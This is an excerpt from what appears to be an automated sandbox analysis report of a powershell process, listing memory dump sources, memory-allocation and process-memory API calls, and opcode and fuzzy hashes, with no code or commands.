                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$_errno$_calloc_implcalloc
                                                                                        • String ID:
                                                                                        • API String ID: 4000150058-0
                                                                                        • Opcode ID: 19338f0e73a96c99a948e3ad385d670715a7db7de0076dca34bbf1a16cc29eef
                                                                                        • Instruction ID: 98e7a9b36c89a345673c0244feeb0207c12024cf57fe68167015dbcfbc7fc082
                                                                                        • Opcode Fuzzy Hash: 19338f0e73a96c99a948e3ad385d670715a7db7de0076dca34bbf1a16cc29eef
                                                                                        • Instruction Fuzzy Hash: D3C13B36705B84CAE7A1CF69E88039E77A4F799784F14412AEF8D87B58DB38C459CB01
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$_errno$_calloc_implcalloc
                                                                                        • String ID:
                                                                                        • API String ID: 4000150058-0
                                                                                        • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                                                                        • Instruction ID: add057eed1f8ab2b1e92716d2704fd7101760738a22d0b8d42d79d2c6ea9debc
                                                                                        • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                                                                        • Instruction Fuzzy Hash: E6C11D36705B84CAE760CF69E48439E77A4F39AB84F144129EB8D87B59DF38C459CB01
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2761444284-0
                                                                                        • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                                                                        • Instruction ID: 38ac3165cdc6b2f1602b38e92d88a0bc6d2a092d4e386f5e1ebb2aaa67d016dd
                                                                                        • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                                                                        • Instruction Fuzzy Hash: 9151D539302245C9FA98EB2D94503ED6391BBA3B80F6C4C259F0A67B96DF79C50D8712
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$_errno$AllocHeap_callnewhmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 3531731211-0
                                                                                        • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                                                                        • Instruction ID: 2a405dd0e1b6f2ae0ad5b2080fb6d25dfb69b7a6d606bf12195f79037028f451
                                                                                        • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                                                                        • Instruction Fuzzy Hash: 7151D67E302745D1EA18EB2AD8543EA7391BBA3784F1C0425AE1A177D6DF7EC40E8702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: malloc
                                                                                        • String ID:
                                                                                        • API String ID: 2803490479-0
                                                                                        • Opcode ID: 02107860626bca7ccddeef960abcbd6ecc30b597906c44ed17d0f9ab3b0aaf00
                                                                                        • Instruction ID: a92c3a81ff9c157ff1571bdda3dcb1b610d81961c1872e13965019cad0a4e977
                                                                                        • Opcode Fuzzy Hash: 02107860626bca7ccddeef960abcbd6ecc30b597906c44ed17d0f9ab3b0aaf00
                                                                                        • Instruction Fuzzy Hash: AB41E63A702780CBEB96CB7A94106ED33A1F766B86F588524DF1A47785DF34D809C701
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: malloc
                                                                                        • String ID:
                                                                                        • API String ID: 2803490479-0
                                                                                        • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                                                                        • Instruction ID: 80037d4d59724976187049063fe21b03265afdcb45970ea042151e3f92333d1e
                                                                                        • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                                                                        • Instruction Fuzzy Hash: 6E41863A301680CBEB58DB2AA5146DE73A1F767B84F484535DE7A47785DF38D809C701
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CurrentMemoryProcessReadVirtualfreemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 3766285061-0
                                                                                        • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                                                                        • Instruction ID: 159ec4c670bc64b5613095007107299c8aac53fd24e7e4473e6a5aefb830842d
                                                                                        • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                                                                        • Instruction Fuzzy Hash: 8241B67A316A41C1E760DB2AE5407EF6391E7A77C8F085415AE8947BCAEF3EC14A8701